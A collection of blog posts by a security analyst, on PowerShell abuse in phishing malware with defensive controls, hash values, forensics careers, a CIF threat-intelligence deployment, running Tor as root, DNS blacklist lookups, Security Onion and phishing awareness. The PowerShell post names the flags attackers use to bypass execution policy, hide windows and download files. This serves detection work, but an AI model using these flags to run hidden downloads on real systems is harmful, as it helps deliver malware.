PowerShell : Tool for Admins and Adversaries

Readers!

From last couple of weeks I have been doing some analysing of malware. Mostly, are via phishing attempts. What our adversaries are doing is to first gain easy access to the machine via phishing and creating background processes that calls the compromised domains that downloads the executable, packed with malicious payload. Below is basic timeline of a phishing email with attachment.

timeline

The technique is neither new or unique, however if we are to come up with a trend we can see that most of them have similar tools and procedures.One such tool is PowerShell. The blog is not about what PowerShell is, but how our adversaries are using the tool that was just created to automate admin tasks within Windows environment. As automation is was one of the key points PowerShell was given scripting. The scripting allows to automate admin tasks such as configuration management etc. Here I go explaining what PowerShell is.

Microsoft definitely didn’t intended the tool to be security aware, and therefore till this date one can use PowerShell to perform malicious activities. However, certain controls or functionality within PowerShell can assist us in controlling type of scripts that can run on the systems.

There are indeed multiple security controls that we will discuss later in the blog but first let’s see what our adversaries are doing. I will not be going in specific analysis of a malware as I am trying to reach out to the teams which are responsible to detect/prevent these type of attacks by placing feasible and actionable security controls with regards to PowerShell.

Below is a sample PowerShell command seen in most cases :

ps-command

Frequently used parameters :

  1. ExecutionPolicy bypass – Execution policies  in  PowerShell determines whether a script can run and what type of scripts can run and also sets default policy. Microsoft added a Flag called ‘bypass’, which when used bypasses any currently assigned execution policy and runs the script without any warnings. There are 4 types of Execution policies:
    1. Restricted
    2. Unrestricted
    3. AllSigned
    4. RemoteSigned
  2. windowstyle hidden – This parameter is used when PowerShell script requires to be run in background without the users knowledge.
  3. noprofile – PowerShell profile are set profile or commands (it is actually a PowerShell script), normally for current user and host. Setting -noprofile will just launch any script and will not look for profiles.
  4. DownloadFile – For downloading the file via web

Tools, Technique and Procedures:

  1. The attachments as shown in the first screenshot, are mostly Word/Excel doc with Macros or zip files with JavaScripts.
  2. The Macros or JS are heavily obfuscated and sometimes lightly. For heavily deobfuscated scripts I rely on dynamic analysis(the best way to know what malware is written for). Some scripts, due to practice, I can deobfuscate within minutes.
  3. PowerShell command to download the file are mostly on sites with HTTP rather on HTTPS (there are some sophisticated adversaries created/compromised HTTPS websites). Sometimes, also have noticed use of cmd.exe /c being used which will invoke specified command and terminates it.
  4. File on the compromised domain are mostly windows executables with ‘.exe’ or sometimes the extension is hidden. This depends on the adversary and the packers that they have used. Sometimes, you can unpack the ‘exe’ via 7zip.
  5. Based on the commands the file will be first downloaded and executed. In certain cases I have seen the file gets deleted after execution. Again, it depends on the command.
  6. Most malwares that I have analysed were either ransomware or trying to steal information and sometimes combination of both.

Above TTPs are very simple to understand however, implementing security controls, lets say for each steps to detect and prevent, is much harder. We as a team or individual are working towards reducing the impact of the incident. Consider the phases of cyber kill-chain and perform an analysis of incidents within your team, and understand at which phase you are able to catch the adversary and can you do that earlier?

Observables such as IP addresses, domains, URLs and file hashes with context are the IOCs that normally we look for and use it for detection and prevention. Some people call that Threat Intelligence. Darwin would have gone here Seriously?

download

Security controls such as Endpoint solutions, Proxy, IDPS and FW can help us but they are heavily dependent on what they know and history has shown us that they can be bypassed. However, they are indeed very good controls to either reduce the impact and/or preventing the known attacks or IOCs.

What we need is security controls based on TTPs. So let’s see some of the following controls that can be implemented to either detect and/or prevent such attacks :

  1. DO NOT give admin privileges to the local account. If required based on their role give have a Admin pass generator with User Access Control (UAC) enabled, that will prompt to enter password for Administrator every time a system change such as installing a program, running an Admin task etc is created.
  2. Group policies to have certain tasks especially script execution and writing to registry and windows directory only allowed by Administrator. Can use Administrative Templates.
  3. Group policy to not allow any executables in TEMP directory to be saved/executed.
  4. Sign all PowerShell script. If not possible or the team not willing to sign at restriction placed via above mentioned points can assist.
  5. Can also set the Execution Policy to Restricted, PowerShell can only be used interactively to run the script. Organisation who are not pushing any policies via PowerShell can choose this option.
  6. Application whitelisting – Windows AppLocker. The tools can assist to define what level of access a user can have on the system with regards to executables, scripts and DLLs.
  7. Having AppLocker in Allow Mode can assist the team with a rule that only scripts at trusted location can run on the system. A attacker can re-write the rule provided, he/she has access on the system with Admin privileges.
  8. PowerShell Language Mode – Admin can setup the language modes to Constrained Language Mode that permits all Windows cmdlets and all Windows PowerShell language elements, but it limits permitted types. It has list of types that are allowed within a PowerShell script. For example, New-Object type cmdlet can only be used with allowed types which does not contain system.net.webclient.
  9. Logging of PowerShell is also important. Here, in my opinion Sysmon is a must have. The logs can be forwarded to SIEM for correlation. If Sysmon is not feasible, enabling PowerShell Module logging is highly recommended. Enhanced logging is always recommended and will  write another blog on that.
  10. Organisation proxy to be configured properly to detect/prevent web request invoked via PowerShell. Have tested with command Invoke-request that can show WindowsPowerShell within User-Agent. However, no User-Agent string is noted when above mentioned to DownloadFile is used. May be Proxies can be configured to disallow any traffic without User-Agent – still have to verify whether such functionality exists. If not a SIEM rule can be used to alert on web traffic that has no User-Agent string, going to external sites and downloading files.

Please note, that AppLocker and Powershell constrained mode are not security feature but another layer of defense which can help to reduce the impact of the attack and in some cases completely prevent the execution of foreign scripts.

When making a business case to the board or C-Level executives to make any changes in the organisation the presenter should use language they understand. As part of the evidence it highly recommended to show actually incidents where current security controls failed which impacted the productivity of the user, loss of data and hours spent to recover and restore systems. They want to know how any new mentioned or suggested changes will help in reducing impact to the user or business.

If there are other methods that other organisations are using please let me know.

A good read – PowerShell for Blue Team

 

Hash Values – A Trivial Artefact

Readers!

Merry Christmas and Happy new year to all. The days of holiday spam and vendor predictions are here.

Here I am spending summer afternoon watching TV and writing on my blog. As I am bit lazy during holidays I am posting something simple. The post is about HASH values and how trivial they are in identifying malicious files/programs.

You can read about Hash here.

Hash values are important to first verify the files. Think of it as a signature or footprint. As living beings has a signature or footprint that we can recognise them from, similarly files  have something called digital footprint that we can identify them from.

Take example of HashCalculator. Following screenshot shows different hash values of HashCalc.exe.

hashcalc

As you can see HashCalc provides lot of information (digital footprint) of its own. With regards to security the hashes are normally used to verify the file as mentioned earlier. Let’s look at the output in brief for commonly used hash values :

  • MD5 – Based on Message Digest algorithm. Normally represent as 32 hexadecimal digits. Vulnerable to collision attacks. Read further here.
  • SHA-1 – Secure Hash Algorithm 1. Represented as 40 digit hexadecimal digits. Generates 160 bits message digest. Vulnerable to collision attacks. No longer in use and has been replaced by SHA-2 and SHA-3. Read further here.
  • SHA-256 – Secure Hash Algorithm 2. Represented as 64 digit hexadecimal digits. Generates six digests – SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256. Read further here.

Now, why the blog entry. The information is available on google and Wikipedia. Reason for the blog is Hash values are considered trivial/important in Threat Intelligence and/or cyber security world. Lots of OSINT, vendor intelligence systems share hash values of known malware dropper. This could be an executable, MS office document, Adobe document, image files etc.

Following are few scenarios where Hash values can assist :

  • Hash values can assist in identifying whether the file/program that we have is legitimate or not.
  • Lot of malware analysis blogs will always provide Hash value of identified file/program.
  • The Hash value is also used by Endpoint solutions to detect known malicious files/programs.
  • During Incident Response, one can also use Hash values in YARA rules to detect any malicious files/programs.
  • Organisations can have a list of program with the Hash values of known good  and authorised programs in their organisation, which than can be used to identify any unwanted programs on the system, either via endpoint for real time detection and/or during incident resposne. Benchmarking/Baselining is a complicated process and sometimes not feasible in large organisations.

NIST provides list of known good hash values of legitimate programs, that one can use to compare good vs bad. Read here.

Hash values are just another indicator that gives more targeted detection of malicious files/programs. IP address and URLs are dynamic, not 100% reliable and have low confidence level as a Threat Indicator and therefore Hash values is considered important artefact in Security world.

Happy Holidays!

 

Forensics – Where to start and What to know

Readers

I would like to share my experience and understanding with regards to forensics and where I started to get a foothold in forensics.

Questions that I normally get : I want to get into forensics. What should I study? What kind of certificates are good? What background should I have? 

By this blog I will answer those question based on my experience. I will not dwell into explaining what forensics is and why do we perform that. For that you can just google it and/or read my blog entry – Incident Response and Forensics : The Two Towers. Understand Forensics is considered a specialised field, meaning one must have prior knowledge of fundamentals in operating systems, networking, packet analysis, incident handling etc.

For me I started in Technical Support – this is first due to I was a student and second technical support guys will go through numerous issues and fix through out the day which can be extended into Forensics investigation. For example, a user calls into saying my system is working slow – a tech support guy will first investigate why and provide solution/workaround based on the findings. This helped in understanding system internals especially Windows. One must understand how an operating system works – their processes, services, kernel level attributes etc. A very good link to start is here for windows, here for MacOSX and here for linux. I will be creating mind map for this and will provide them on my github account.

Certificates such as SANS GCFE will give you insights on windows operating system forensics. Individuals thinking of this course should read on here.

Other courses and comparison can be viewed here.

We obviously need tools to perform forensics. There are numerous tools available to perform forensics based on what is required. SANS has their own linux distribution SIFT and further information can be found here.

There is also a debate, that System Admins are the best Forensic examiners or investigators and I don’t agree with that statement. Yes system admins have knowledge of system, however that’s mostly into hardening and fixing an issue. Rarely security aspect is covered in System Admin side. System Admin will still need to learn and/or go through training (self or class based) and understand how their experience overlaps in forensics.

To gain a bit more knowledge about networking, incident handling, packet analysis I dwelled into SOC (security operations centre). This allowed me to understand how operating system communicates to other operating systems, network and/or external systems. In SOC, I was responsible to identify anomalies, develop SIEM content to identify incidents within network and/or operating system from a known bad behaviour. This allowed me understand what is a good behaviour. All operating system logs events and one must understand what is the meaning of those and in what situations they are triggered, and how one can use these events in identifying an unauthorised activity and/or unusual behaviour for example. This knowledge, during forensics, allowed me to investigate the operating system and/or infected host in different manner. Yes, Forensics and Incident Response overlaps and are two sides of the same coin. I always took initiatives and that helped me in the field.

To understand how Forensics should be performed one must also understands standards and RFC. Understanding these standards allowed me to grasp how corporate world and/or any forensics practice should perform forensics and how that can be integrated in Incident Response. Have a read here for NIST publication, here for RFC and here for NIST Mobile forensics publication.

This will be a good start to for individuals interested in Forensics. One should also dive into the operating system they normally use at work/home on their laptop/desktop and go through system. For Windows, work on PowerShell, look at the event viewer, services, use Sysinternal Tools. Fire up wireshark and/or Chrome net internals to see what happens when you access a website. Note down whatever is considered a normal behaviour. For linux/Mac look at the logs under directory /var/logs.

Lastly, read the blogs that are forensics and incident response related which will give a good insight in using tools, how forensics is performed and current methodologies and type of investigations.

Few Forensics Blogs :

Another point, I will raise is certifications are not the only way you will understand or gain more knowledge in Forensics. Your practice and dedication in self-learning and implementing on a regular basis will help a lot. But, also in corporate world these certifications are considered an entry point and it is advisable to get them. I have done SANS certifications (I am not advocating them and/or advertising SANS for personal gain, just sharing my personal experience), and I believe they concentrate on fundamentals and have better content with related to topics that are covered in any certifications.

I will be providing more links on the up coming mind map. I will also be providing any Forensic and/or IR investigations that I perform, at my home lab including tools usage.

Happy Forensicating!!!!!

The Vendor, The MSSPs and The Consultant

I have been waiting for quite a while to write something about my experience with vendors, MSSPs and consultants. This is my own opinion and is not targeting any specific entity. I have worked with multiple vendors, MSSPs and consultants and what I have always noticed is, the “OUR” attitude. I do understand they are here to make money and sell their services/solutions, but there is nothing wrong in sprinkling it with some honesty.

  • Vendors – Buy our products and you will be safe.
  • MSSPs – Subscribe to our services and you will be safe.
  • Consultants – Implement our recommendations and you will be safe.

We all know once you are connected to Internet eventually there would be someone to target and successfully gain access to your systems. Its not about ‘if’ its about ‘when’ (SANS GCIH). There are no “PERFECT” systems. There are ways to access air-gapped systems too. But this is beyond this article.

I see, Vendors are for detection and prevention – MSSPs are more reactive – but lot of customers and few eyes and sometimes those eyes are not much experienced – Consultants – How many consultants have actually used the product that they are endorsing/recommending – wouldn’t it be good if they are recommending a product/solution that they have actually used.

This attitude is one of the many reason why organisations get breached – ofcourse security awareness and correct implementation of security controls is also required – but imagine, if all three work together and provide honest, correct and pro-active solutions to customers, it would be a completely different picture. Also, organisations need to heavily invest on people. Lot of organisations are relying on outsourcing their security, and completely depending on them. This concept is wrong and every organisations should have security team with expertise in multiple areas internally to have additional eyes on the organisation.

Understand, our adversary – CYBER CRIMINALS – work as a team and with a strategy and we should too.

CIF – Collective Intelligence Framework – My deployment

Morning Everybody!!!!

Been working on crafting my skills in Threat Intelligence and available open source system. As the title says I have been working on CIF from CSIRT and wanted to share my experience and my personal future developments.

Following are few screenshots of the system :

threat feeds ioc type applicationscif map

CIF comes with few default threat feeds and parsers. The scripts have parsers and remote hosts that are sending feeds. IOCs (Indicators of Compromise) such as IP address, URL, MD5 etc are fetched from the feeds. The scripts are written in YAML – human reabable text based language.

Visualisation is provided by Kibana (works on kibana 3 – shown above and Kibana 4 ) and ElasticSearch (1.4) is as database. Working on getting this to be updated on 2.x – requires full cluster update.

Experience :

  • I am running on a VM, Ubuntu, and have no issues. Sometimes do have to restart apache2, elasticsearch and cif services to populate custom dashboards and real-time data. Although one can make it as automated task by scripting or configure in cron tab.
  • System responsiveness is very good and intelligence feeds are quite good. Can be easily integrated with SIEM for additional context.
  • If you are security researcher and able to identify new IOC, you can update them on csirt.io and than it can be pulled as feeds onto the system – https://csirtg.io/users/makflwana/feeds

Future work:

  • I am currently working on more feeds – open source and writing parsers for them. I will be updating them on my github account : https://github.com/makflwana
  • STIX and TAXII – if i can
  • Working with CSIRT with regards to cif v3 – Bearded Avenger

Final words:

This is an excellent open source initiative from CSIRT (http://csirtgadgets.org/) in providing us with a framework and platform to share intelligence. One of the reason why hackers are one step ahead is they have better information sharing than organisation fighting against them and most of that is free and available in underground – dark net as we say. Meanwhile, vendors charges thousands and millions to share threat information.

 

Installing/running TOR on Linux distros

TOR – The onion routing – famous for anonymity. TOR browser gives user an edge to be anonymous while browsing.

Installing TOR on windows box is easy but in linux especially as  root user there are some issues. Following errors I faced to execute or open TOR browser :

1. The bundle cannot be run as a root user
2. The browser unexpectedly closed and requires reboot.

Steps to fix the issue – remember its not required to create a new user. Root can run the browser.

1. Open start-tor-browser in nano, leafpad, gedit etc and comment the function as below :
#if [ “`id -u`” -eq 0 ]; then
# complain “The Tor Browser Bundle should not be run as root. Exiting.”
# exit 1
#fi
2. Open terminal and change ownership of root:
chown -hR root tor-browser_en-US/

Open browser by ./start-tor-browser.desktop

Happy TORing…..

Comand line use to check IP reputation

Looking for reputation of an IP address is one of the most frequent task of an SOC analyst. There are number of online tools and script that does the task.

However, I always used command line to identify whether a IP address is blacklisted on any blacklist. The reason is number of online tools still show the IP as blacklisted but actual blacklisting parties such as spamhaus has already removed the IP from their blacklist.

Analyst can use either scripts or command line to get the results. nslookup, dig and host can be used to check the IP address against known blacklisting vendors.To check analyst need to know that the information that they are looking should be available by using certain DNS records.

If an analyst is using online tools than he/she can enter actual IP address such as 1.2.3.4. However, for the command line one has to reverse the IP address to be able to match to the blacklists.

samples :

nslookup 4.3.2.1.zen.spamhaus.org
host 4.3.2.1.zen.spamhaus.org
dig -x 4.3.2.1.zen.spamhaus.org

More blacklists to check :
zen.spamhaus.org
xbl.spamhaus.org
pbl.spamhaus.org
spam.abuse.ch
cbl.abuseat.org
virbl.dnsbl.bit.nl
dnsbl.inps.de
ix.dnsbl.manitu.net
dnsbl.sorbs.net
bl.spamcannibal.org
bl.spamcop.net
dnsbl-1.uceprotect.net
dnsbl-2.uceprotect.net
dnsbl-3.uceprotect.net
db.wpbl.info

site to check 1 IP against multiple blacklisting  : http://multirbl.valli.org/

Ubuntu – Security Onion Networking issue

Been using Security Onion for a while now. A very good OS for analysis and getting IDS alerts on the go without installing expensive hardware. But recently, due to some updates been facing some issue with regards to internet connections.

Not sure what the Network-Manager updates do but while installing Security Onion if you select “Install Updates while Downloading” for some reason network-manager shows attitude and internet connection just gets lost after setting up the management and monitoring interfaces.

Have searched lot on the forums and multiple ideas. This worked to get the internet start.

“sudo service network-manager restart” and also deleting interface details from /etc/network/interfaces

This does started internet but somehow monitoring on the interfaces doesn’t work.

Also, realised that the machine gets slower for some reason regardless of it being a VM or Security Onion as host operating system.

Than tried not to select the updates during installation and Lock the Version of Network-Manager from Synaptic Package Manager. Than updated the system and rebooted.

Internet was working. Checked Sguil and but no alerts for testmyids.com. tcpdump does shows traffic.

Did a reboot and wallah….all working properly. Can see alerts on Snorby and Sguil.

Emails – The good, The bad and The ugly side

Emails – as we know is a very efficient way to communicate without physically visiting the intended recipients. Emails have been with us from many years and initial take for email was to reduce time and effort in communication.

But recently emails are being used for social engineering and phishing. Forget about the good old days where you were receiving emails only from known parties. Now even prince of Nigeria have your email and wants to give you money.

As an security researcher and a SOC analyst, have noticed that email communication is top and one of most used channel to transfer these malicious files. It’s like yelling name John in a crowd. Somebody will eventually respond.

Detecting suspicious emails ?

  1. Language  – typos and grammar will be there – sometimes they are not.
  2. Sender domain – may have typo or a legitimate one.
  3. Roll over you mouse to the embedded links in the email and you will see random site.
  4. Attachment – names are too close or suspicious.

The best way to fight this is with user awareness. Emails exploit most vulnerable entity  – HUMAN. A mind where curiosity inevitably kills the cat.

Attackers thrives on 2 human characteristics – FEAR and CURIOSITY.

  1. FEAR – we have noticed a suspicious transaction on your account. Please click on this link to change the password.
  2. CURIOSITY – sorry we have missed you and have a package waiting for you. Please open the attached file to get more information. There is package indeed but for your PC – malware I mean 🙂

Other ways to detect :

  1. Mail gateways with proper monitoring
  2. DLP – can be used to monitor the content of the email.